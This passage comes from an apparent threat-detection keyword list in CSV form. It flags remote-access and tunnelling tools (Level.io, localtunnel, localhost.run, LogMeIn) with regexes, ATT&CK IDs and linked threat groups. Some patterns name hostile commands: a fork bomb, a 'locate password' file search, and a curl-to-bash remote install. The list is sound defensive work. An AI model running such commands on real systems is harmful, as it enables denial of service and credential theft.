Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files\Level\winpty.dll*",".{0,1000}\\Program\sFiles\\Level\\winpty\.dll.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files\Level\winpty-agent.exe*",".{0,1000}\\Program\sFiles\\Level\\winpty\-agent\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Temp\install_windows.exe*",".{0,1000}\\Temp\\install_windows\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*<\Level\Level Watchdog>*",".{0,1000}\<\\Level\\Level\sWatchdog\>.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Level Software, Inc.<*",".{0,1000}\>Level\sSoftware,\sInc\.\<.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Remote device management - https://level.io<*",".{0,1000}\>Remote\sdevice\smanagement\s\-\shttps\:\/\/level\.io\<.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - 
T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*37B9B43761672219E98BFA826E7AF17E799592BC57ACBC4AAC38DAF5EFAAF653*",".{0,1000}37B9B43761672219E98BFA826E7AF17E799592BC57ACBC4AAC38DAF5EFAAF653.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*3DDF7FBB35EC90BCF15E723F1445EEB71E71C9757243EFEC1CEB4E74A10A1D9F*",".{0,1000}3DDF7FBB35EC90BCF15E723F1445EEB71E71C9757243EFEC1CEB4E74A10A1D9F.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*agents.level.io*",".{0,1000}agents\.level\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*builds.level.io*",".{0,1000}builds\.level\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://app.level.io/devices*",".{0,1000}https\:\/\/app\.level\.io\/devices.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*https://docs.level.io/1.0/admin-guides/level-watchdog-task*",".{0,1000}https\:\/\/docs\.level\.io\/1\.0\/admin\-guides\/level\-watchdog\-task.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://downloads.level.io/install_linux.sh*",".{0,1000}https\:\/\/downloads\.level\.io\/install_linux\.sh.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://downloads.level.io/install_mac_os.sh*",".{0,1000}https\:\/\/downloads\.level\.io\/install_mac_os\.sh.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://downloads.level.io/install_windows.exe*",".{0,1000}https\:\/\/downloads\.level\.io\/install_windows\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://downloads.level.io/stable/level-linux-amd64*",".{0,1000}https\:\/\/downloads\.level\.io\/stable\/level\-linux\-amd64.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*LEVEL_API_KEY=* bash -c ""$(curl -L 
*",".{0,1000}LEVEL_API_KEY\=.{0,1000}\sbash\s\-c\s\""\$\(curl\s\-L\s.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*logs.logdna.com*",".{0,1000}logs\.logdna\.com.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*netsh advfirewall firewall add rule name=\""Level Agent\""*",".{0,1000}netsh\s\sadvfirewall\sfirewall\sadd\srule\sname\=\\\""Level\sAgent\\\"".{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*online.level.io*",".{0,1000}online\.level\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Program Files\Level\level.log*",".{0,1000}Program\sFiles\\Level\\level\.log.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*realtime.ably.io*",".{0,1000}realtime\.ably\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*rest.ably.io*",".{0,1000}rest\.ably\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*:(){:I: &I*",".{0,1000}\:\(\)\{\:I\:\s\&I.{0,1000}","greyware_tool_keyword","linux","fork bomb linux - denial-of-service attack wherein a process continually replicates itself to deplete available system resources slowing down or crashing the system due to resource starvation","T1499","TA0040","N/A","N/A","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*http://*.localhost.run*",".{0,1000}http\:\/\/.{0,1000}\.localhost\.run.{0,1000}","greyware_tool_keyword","localhost.run","Put a locally running HTTP HTTPS or TLS app on the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://localhost.run/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://*.localhost.run*",".{0,1000}https\:\/\/.{0,1000}\.localhost\.run.{0,1000}","greyware_tool_keyword","localhost.run","Put a locally running HTTP HTTPS or TLS app on the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://localhost.run/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ssh * .localhost.run*",".{0,1000}ssh\s.{0,1000}\s\.localhost\.run.{0,1000}","greyware_tool_keyword","localhost.run","Put a locally running HTTP HTTPS or TLS app on the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://localhost.run/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ssh * localhost.run*",".{0,1000}ssh\s.{0,1000}\slocalhost\.run.{0,1000}","greyware_tool_keyword","localhost.run","Put a locally running HTTP HTTPS or TLS app on the internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://localhost.run/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* --name localtunnel *",".{0,1000}\s\-\-name\slocaltunnel\s.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","0","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z" "*.localltunnel.me*",".{0,1000}\.localltunnel\.me.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","1","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z" "*/go-localtunnel.git*",".{0,1000}\/go\-localtunnel\.git.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z" "*/gotunnelme.git*",".{0,1000}\/gotunnelme\.git.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z" "*/localtunnel.git*",".{0,1000}\/localtunnel\.git.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","1","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z" "*/localtunnel.js*",".{0,1000}\/localtunnel\.js.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","1","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z" "*d0274f036468ef236d3a526bb6235289bdbe4c8828ee7feee1829a026f5f3bec*",".{0,1000}d0274f036468ef236d3a526bb6235289bdbe4c8828ee7feee1829a026f5f3bec.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","0","#filehash","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z" "*e367bbc84b75901ae680472b7b848ee4f10fbc356e7dd8de5c2c46000cf78818*",".{0,1000}e367bbc84b75901ae680472b7b848ee4f10fbc356e7dd8de5c2c46000cf78818.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","0","#filehash","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z" "*gotunnelme *",".{0,1000}gotunnelme\s.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","0","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z" "*https://localtunnel.me*",".{0,1000}https\:\/\/localtunnel\.me.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your 
localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","1","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z" "*install -g localtunnel*",".{0,1000}install\s\-g\slocaltunnel.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","0","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z" "*localtunnel/go-localtunnel*",".{0,1000}localtunnel\/go\-localtunnel.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z" "*localtunnel/server.git*",".{0,1000}localtunnel\/server\.git.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z" "*localtunnel-server:latest*",".{0,1000}localtunnel\-server\:latest.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z" "*NoahShen/gotunnelme*",".{0,1000}NoahShen\/gotunnelme.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - 
T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z" "*npx localtunnel *",".{0,1000}npx\slocaltunnel\s.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","0","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z" "*src/gotunnelme/*",".{0,1000}src\/gotunnelme\/.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z" "*yarn add localtunnel*",".{0,1000}yarn\sadd\slocaltunnel.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","0","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z" "*locate password | more*",".{0,1000}locate\spassword\s\|\smore.{0,1000}","greyware_tool_keyword","locate","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","N/A","greyware_tools high risks of false positives","6","4","N/A","N/A","N/A","N/A" "*.console.gotoassist.com*",".{0,1000}\.console\.gotoassist\.com.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - 
Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.remoteview.logmein.com*",".{0,1000}\.remoteview\.logmein\.com.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/LMI_Rescue.exe*",".{0,1000}\/LMI_Rescue\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/LMIRTechConsole.exe*",".{0,1000}\/LMIRTechConsole\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\*\rescue.log*",".{0,1000}\\AppData\\Local\\.{0,1000}\\rescue\.log.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\AppData\Local\LMIR*.tmp.bat*",".{0,1000}\\AppData\\Local\\LMIR.{0,1000}\.tmp\.bat.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\LogMeIn Rescue Applet\*",".{0,1000}\\AppData\\Local\\LogMeIn\sRescue\sApplet\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\LocalLow\LogMeIn Rescue\*",".{0,1000}\\AppData\\LocalLow\\LogMeIn\sRescue\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LMI_Rescue.exe*",".{0,1000}\\LMI_Rescue\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\lmi_rescue_srv.exe*",".{0,1000}\\lmi_rescue_srv\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LMIGuardianEvt.dll*",".{0,1000}\\LMIGuardianEvt\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LMIR*.tmp\rarcc.dll*",".{0,1000}\\LMIR.{0,1000}\.tmp\\rarcc\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LMIRescue-*.clog*",".{0,1000}\\LMIRescue\-.{0,1000}\.clog.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LMIRescue-*.connlog*",".{0,1000}\\LMIRescue\-.{0,1000}\.connlog.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a 
legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LMIRescueCOL.log*",".{0,1000}\\LMIRescueCOL\.log.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LMIRescueMqttMessages_*.dat*",".{0,1000}\\LMIRescueMqttMessages_.{0,1000}\.dat.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LMIRescueUpdater.log*",".{0,1000}\\LMIRescueUpdater\.log.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LMIRhook.000.dll*",".{0,1000}\\LMIRhook\.000\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to 
provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\lmirtechconsole.exe*",".{0,1000}\\lmirtechconsole\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LMIRTechConsole.exe*",".{0,1000}\\LMIRTechConsole\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LMITrs-*.trs*",".{0,1000}\\LMITrs\-.{0,1000}\.trs.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LogMeIn Rescue Applet\LMIR*",".{0,1000}\\LogMeIn\sRescue\sApplet\\LMIR.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - 
Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LogMeIn Rescue Applet\LMIR*",".{0,1000}\\LogMeIn\sRescue\sApplet\\LMIR.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LogMeIn Rescue AVI Codec\*",".{0,1000}\\LogMeIn\sRescue\sAVI\sCodec\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\logmein rescue technician console\*",".{0,1000}\\logmein\srescue\stechnician\sconsole\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LogMeIn\Dumps\*",".{0,1000}\\LogMeIn\\Dumps\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - 
